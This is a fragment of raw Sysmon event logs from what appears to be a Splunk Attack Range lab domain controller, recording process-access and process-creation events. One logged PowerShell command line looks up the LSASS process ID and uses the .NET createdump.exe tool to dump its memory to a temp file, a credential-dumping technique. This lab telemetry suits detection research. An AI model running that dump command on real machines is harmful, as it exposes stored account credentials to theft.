21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDD-60D3-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025843Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025842Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.691{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9DDB-60D3-0900-00000000CF01}568C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025841Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.691{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A346-60D3-6506-00000000CF01}6532C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025840Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.691{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A346-60D3-6506-00000000CF01}6532C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025839Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.660{4DB9351A-9DDE-60D3-1600-00000000CF01}12925648C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6506-00000000CF01}6532C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025838Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.629{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6506-00000000CF01}6532C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025837Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.582{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A346-60D3-6506-00000000CF01}6532C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025836Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.582{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6506-00000000CF01}6532C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025835Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.566{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025834Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.566{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025833Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.566{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025832Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.520{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025831Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.457{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025830Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.457{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025829Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.457{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025828Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.457{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025827Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.457{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025826Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.457{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025825Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.457{4DB9351A-A345-60D3-6306-00000000CF01}36565804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64) 154100x800000000000000025824Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.462{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\System32\tasklist.exe10.0.14393.0 (rs1_release.160715-1616)Lists the current running tasksMicrosoft® Windows® Operating SystemMicrosoft Corporationtasklist.exe"C:\Windows\system32\tasklist.exe"C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=6F2FDCF651A1650FC7B4FC5A860E4D9D,SHA256=27EDDAC6A2E5A74DF67C534393B0B025B03D61310748BE016DCE348A02D30A22,IMPHASH=9C5CFDDF3336412B8046D54234415205{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {echo \""Createdump Path C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe\"" $LSASS = tasklist | findstr \""lsass\"" $FIELDS = $LSASS -split \""\s+\"" $ID = $FIELDS[1] & \""C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe\"" -u -f C:\Windows\Temp\dotnet-lsass.dmp $ID} 23542300x800000000000000025823Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.374{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC1BEF343759DF9603F8BA5DE8572310,SHA256=5A9237C96BC99CD984367B1846EE17DCF3E9C669BE019E07382A7FA4ED5E6AF5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025822Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.202{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025821Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.202{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025820Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 